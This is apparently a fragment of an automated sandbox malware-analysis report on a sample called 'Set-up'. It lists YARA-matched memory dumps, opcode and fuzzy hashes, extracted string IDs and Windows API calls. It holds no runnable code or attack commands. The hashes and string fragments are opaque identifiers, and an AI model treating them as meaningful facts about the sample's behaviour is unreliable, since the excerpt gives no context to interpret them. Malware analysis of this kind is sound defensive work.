                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: #D)J$'HIN$:\B
                                                                                                                                                  • API String ID: 0-3190177590
                                                                                                                                                  • Opcode ID: 56b848c57f425555c93d2ba29d93e1012366b44b596e5d4982ac7b6a83390f84
                                                                                                                                                  • Instruction ID: 5ed9664a9fa1dcf7435137d128af4a3d27c2bfd8df4bb8e88381a83a3b2fc6c9
                                                                                                                                                  • Opcode Fuzzy Hash: 56b848c57f425555c93d2ba29d93e1012366b44b596e5d4982ac7b6a83390f84
                                                                                                                                                  • Instruction Fuzzy Hash: 4791F3716043119BD724AF20CC92BAB77A2EFD2314F14852CE9958B381EBB9DD45CB92
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorEventLastReset
                                                                                                                                                  • String ID: B$Z$h
                                                                                                                                                  • API String ID: 1621066496-418080759
                                                                                                                                                  • Opcode ID: 8eadb7a91652bfa944a640e96b3fc179b70d92505f1b071b0bfb99f77455d4ea
                                                                                                                                                  • Instruction ID: 0ee0f7fc007db7dcf2997cc137d959ccc1b6f66f856fc6053940abbb4799640b
                                                                                                                                                  • Opcode Fuzzy Hash: 8eadb7a91652bfa944a640e96b3fc179b70d92505f1b071b0bfb99f77455d4ea
                                                                                                                                                  • Instruction Fuzzy Hash: 32A1EA716047058BD724DF39C880AABB7E5AF85308F414D2FE59A87342DA39F909C75A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: %$^$s
                                                                                                                                                  • API String ID: 0-3197480346
                                                                                                                                                  • Opcode ID: b2fa520abd1fa99fad6db686c14425d6a7504fb62f210934f4c32e56f529ce8f
                                                                                                                                                  • Instruction ID: 3db9c703bba5b0efac9b40e651524aa5ad877806ccead3f4dd5b03f547231587
                                                                                                                                                  • Opcode Fuzzy Hash: b2fa520abd1fa99fad6db686c14425d6a7504fb62f210934f4c32e56f529ce8f
                                                                                                                                                  • Instruction Fuzzy Hash: A3612A3290C7A04FEB249A3888112AFBBD66BC6760F194B3DDCE5D77C5D5388A42C742
                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,00414029,?,?,004907E0), ref: 0040B629
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoSystem
                                                                                                                                                  • String ID: )@A
                                                                                                                                                  • API String ID: 31276548-964663934
                                                                                                                                                  • Opcode ID: 6b6b034566826ebc9283fd6e4c36b993f8209ddfec5c274be0ff81ef8bf4a550
                                                                                                                                                  • Instruction ID: 59f4018fa932fe2eabc879f942c9d824a887892a3394e16cfb49e356fd9e0c66
                                                                                                                                                  • Opcode Fuzzy Hash: 6b6b034566826ebc9283fd6e4c36b993f8209ddfec5c274be0ff81ef8bf4a550
                                                                                                                                                  • Instruction Fuzzy Hash: FAC09B7490421D97CB00E7E5D94988F77FCE748105F400461D555E3140E670F9958795
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: N$|
                                                                                                                                                  • API String ID: 0-756983145
                                                                                                                                                  • Opcode ID: 76d2458fce463a1200e71a99e6c4a55d2164a21526f58a7e73da5fe15c7b42a4
                                                                                                                                                  • Instruction ID: 17e3fbaca881b04f1db986341dbacd4b1e6ba648e9dd7b454ec7d920d854ec45
                                                                                                                                                  • Opcode Fuzzy Hash: 76d2458fce463a1200e71a99e6c4a55d2164a21526f58a7e73da5fe15c7b42a4
                                                                                                                                                  • Instruction Fuzzy Hash: D062587550C3918FD725DF24C8907AEBBE2AF96310F184A6CE8D54B392D6358D0ACF92
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0$8
                                                                                                                                                  • API String ID: 0-46163386
                                                                                                                                                  • Opcode ID: 81d80e944959e083bf15ad58160060e60005621983e4b70c14e5cb8d3be6861a
                                                                                                                                                  • Instruction ID: a3d2c5f7cf71d0d293b67e3dd51211488a60f11c632110d230c0115a3f6a99e9
                                                                                                                                                  • Opcode Fuzzy Hash: 81d80e944959e083bf15ad58160060e60005621983e4b70c14e5cb8d3be6861a
                                                                                                                                                  • Instruction Fuzzy Hash: 3F7246715083409FD714DF18C884BABBBE2BF88314F148A2DF9898B391D775D958CBA2
                                                                                                                                                  APIs
                                                                                                                                                  • GetVersion.KERNEL32 ref: 0046D37A
                                                                                                                                                    • Part of subcall function 0046E5E6: HeapCreate.KERNEL32(00000000,00001000,00000000,0046D3B2,00000001), ref: 0046E5F7
                                                                                                                                                    • Part of subcall function 0046E5E6: HeapDestroy.KERNEL32 ref: 0046E636
                                                                                                                                                  • GetCommandLineA.KERNEL32 ref: 0046D3D9
                                                                                                                                                    • Part of subcall function 0046D469: ExitProcess.KERNEL32 ref: 0046D486
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$CommandCreateDestroyExitLineProcessVersion
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1387771204-0
                                                                                                                                                  • Opcode ID: e656b266d4260b4ff18ad09f8e5a84f821897ab9df7f5e8d58a8cb81b0538a10
                                                                                                                                                  • Instruction ID: d75178d21a9ad8043be8486d7b5b0d6a43d48c7013b3882ba6fb75474c0e5f67
                                                                                                                                                  • Opcode Fuzzy Hash: e656b266d4260b4ff18ad09f8e5a84f821897ab9df7f5e8d58a8cb81b0538a10
                                                                                                                                                  • Instruction Fuzzy Hash: F621A1B0E40200AFEB09AF66DC0676A77A8EB15709F50403FF805973A1FA3D49408B5E
                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemTime.KERNEL32(?,?,?,00000000,00000000,004907E0), ref: 0040B82D
                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040B838
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Time$System$File
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2838179519-0
                                                                                                                                                  • Opcode ID: 8eb197beb2b384edb10e4f52f46dcea3cda7a3dd36a34a3b69b8ae55a48a6358
                                                                                                                                                  • Instruction ID: 771ab5c1123d3e6bd0a20603db53fc0c5b3be4b18b26dc4f71310ee56c531f31
                                                                                                                                                  • Opcode Fuzzy Hash: 8eb197beb2b384edb10e4f52f46dcea3cda7a3dd36a34a3b69b8ae55a48a6358
                                                                                                                                                  • Instruction Fuzzy Hash: 2ED0127280012DABDF00FBE8DC0ECEF7BBCF949114B840966A515D3041E6B0E915C7E5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: )$IEND
                                                                                                                                                  • API String ID: 0-707183367
                                                                                                                                                  • Opcode ID: 5be40a83e590b3ad905db483267d953d55a172221304e4b74163a420d5e896f5
                                                                                                                                                  • Instruction ID: ed64467ff55cfef50df94dbabae7d3e756f6b215f310ede25f8cd0a70ab39eb3
                                                                                                                                                  • Opcode Fuzzy Hash: 5be40a83e590b3ad905db483267d953d55a172221304e4b74163a420d5e896f5
                                                                                                                                                  • Instruction Fuzzy Hash: E8D1DFB19083449FD720EF24C841B9ABBE5EF94304F144A2DF99A9B381D775D908CF96
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ()
                                                                                                                                                  • API String ID: 0-1580606521
                                                                                                                                                  • Opcode ID: 8727d8e0c9c1950316ae5dce8af273db3da0820350690cca7c4e99917d25aca6
                                                                                                                                                  • Instruction ID: 3e87f0aa3f0530e91881f7f22c4beb36a03e62912cdc4e4c309ddab6caf4345a
                                                                                                                                                  • Opcode Fuzzy Hash: 8727d8e0c9c1950316ae5dce8af273db3da0820350690cca7c4e99917d25aca6
                                                                                                                                                  • Instruction Fuzzy Hash: 3DA247726093009BDB24CB349D827ABBBD7FBD2324F29952CE59187791D7B1DC028B46
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: - !&$i
                                                                                                                                                  • API String ID: 0-720982556
                                                                                                                                                  • Opcode ID: 124137678305f0de057eb441684d7eea708a06d3e718c750c25a99a443d1c7bd
                                                                                                                                                  • Instruction ID: f248e508d235215ec07bedbb402ab5a1e26eff0ab97046d09915953083243267
                                                                                                                                                  • Opcode Fuzzy Hash: 124137678305f0de057eb441684d7eea708a06d3e718c750c25a99a443d1c7bd
                                                                                                                                                  • Instruction Fuzzy Hash: 7AA100B450C3D28AE3358F2594903EBBBE2AFA2304F184A6CD4C95B352D7394A46CB56
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: /$bvlM
                                                                                                                                                  • API String ID: 0-1930407272
                                                                                                                                                  • Opcode ID: b5c72a53b7e059507d23fe8725458bce3b2582cee41e0d10917d18d9c409389c
                                                                                                                                                  • Instruction ID: 882820f68f3cac79fbffa7c4467fe84603ca12af74b7cd405d6d67a3188c76ff
                                                                                                                                                  • Opcode Fuzzy Hash: b5c72a53b7e059507d23fe8725458bce3b2582cee41e0d10917d18d9c409389c
                                                                                                                                                  • Instruction Fuzzy Hash: EB81FB756057814BDB2E8F3984A1672BFD3AFA7310B1C86ADC4D28F78AC739A406C750
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $vt$~|
                                                                                                                                                  • API String ID: 0-3628718825
                                                                                                                                                  • Opcode ID: d20c11543bd37ac65bf897c54a8009a7813f50d7f27ca523f33e0c6a90733d50
                                                                                                                                                  • Instruction ID: 39ef38749dea295b8cf6b38d1261913f26cae85be28de1de93f6790c5e82820d
                                                                                                                                                  • Opcode Fuzzy Hash: d20c11543bd37ac65bf897c54a8009a7813f50d7f27ca523f33e0c6a90733d50
                                                                                                                                                  • Instruction Fuzzy Hash: 1581E3756006018BDB39CF29C851673B7F2FF96315B29856DE496CBBA4E734E802CB50
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 7$gfff
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: [$h
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: x%mQ$x%mQ
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: B)D+$BC@
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: q$tHm;
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: L4$L4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: T5Z$@F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ZE
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: f
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: YA1
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00427B74
                                                                                                                                                    • Part of subcall function 0046BBC0: RaiseException.KERNEL32(?,?,R@,?,?,?,0047D380,?,?,?,004052E0), ref: 0046BBEE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionH_prologRaise
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3968804221-0
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 2
                                                                                                                                                  • API String ID: 0-450215437
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 3
                                                                                                                                                  • API String ID: 0-2413921980
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: b7T5
                                                                                                                                                  • API String ID: 0-422268914
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: YA1
                                                                                                                                                  • API String ID: 0-613462611
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-1614059158
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ^U
                                                                                                                                                  • API String ID: 0-2128660318
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: d
                                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: M;
                                                                                                                                                  • API String ID: 0-3037055635
                                                                                                                                                  • Opcode ID: f79d1ede9cfe65ded3bd0ff3d248eb7c7607cf6c69a08866558a1506528d48c3
                                                                                                                                                  • Instruction ID: 0e34c5082d8228dd90e60cd06e9485ccc8406159064aa110cd33f8c1359a4571
                                                                                                                                                  • Opcode Fuzzy Hash: f79d1ede9cfe65ded3bd0ff3d248eb7c7607cf6c69a08866558a1506528d48c3
                                                                                                                                                  • Instruction Fuzzy Hash: 1461F16090471487DB259F28D8E26B7B3F5EF52324F18461CE8879B791F378D905C36A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: *+
                                                                                                                                                  • API String ID: 0-2181965719
                                                                                                                                                  • Opcode ID: 44fbe2f06857dfe1bd2ab26994c5d7704707b928ec6d00b9d3c8d2846275c43e
                                                                                                                                                  • Instruction ID: 5429bb3bf282f05ab185426e3ac9a6c902a23258b8b7f1e25cd3f9c0423991c6
                                                                                                                                                  • Opcode Fuzzy Hash: 44fbe2f06857dfe1bd2ab26994c5d7704707b928ec6d00b9d3c8d2846275c43e
                                                                                                                                                  • Instruction Fuzzy Hash: F491C17264C3668BD729CF29884169FF7F2EBC1300F05C92DE4D99B245DB78950A8BC2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ,
                                                                                                                                                  • API String ID: 0-3772416878
                                                                                                                                                  • Opcode ID: 641c535ca8412967089331af0d044e18475cfaee7d8b1a7010998a249a2deaac
                                                                                                                                                  • Instruction ID: c8706aefa77055d9ff7b512de96bd8263b2fb4ace28416738fc20e354acf46de
                                                                                                                                                  • Opcode Fuzzy Hash: 641c535ca8412967089331af0d044e18475cfaee7d8b1a7010998a249a2deaac
                                                                                                                                                  • Instruction Fuzzy Hash: 61B1487010C3819FD324DF28C98065BFBE1AFA9704F584A2DE5D997342D631EA08CBA7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ~
                                                                                                                                                  • API String ID: 0-1707062198
                                                                                                                                                  • Opcode ID: 1e06dd67d23e07e579debcd86735decd35c6d17414cf5e0452fe768e1a5eb5f4
                                                                                                                                                  • Instruction ID: b88e2cdfb42293e0d44b7ae154af6e8340cb61b370af0563ef4321cef0d41eee
                                                                                                                                                  • Opcode Fuzzy Hash: 1e06dd67d23e07e579debcd86735decd35c6d17414cf5e0452fe768e1a5eb5f4
                                                                                                                                                  • Instruction Fuzzy Hash: 78814B729042614FCB25CE28C8503AEBBD2AB85324F19C67DECB99B7D1D6359C0AD7D0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LGSV
                                                                                                                                                  • API String ID: 0-2530040202
                                                                                                                                                  • Opcode ID: d9a895e57cffb3e45f7bc899b6a41e9a0c888e6f0fe25b20cec0ba8a29428f44
                                                                                                                                                  • Instruction ID: 9733d06e71004622ca4a64f17e5a1046c61d33987750903442059ade3fc2ad8a
                                                                                                                                                  • Opcode Fuzzy Hash: d9a895e57cffb3e45f7bc899b6a41e9a0c888e6f0fe25b20cec0ba8a29428f44
                                                                                                                                                  • Instruction Fuzzy Hash: 257147756083918BE318DF69846037BBBD2AF9B304F1888ADE4C69B381CA75CD058B56
                                                                                                                                                  APIs
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0006E1E4), ref: 0046E22F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmp
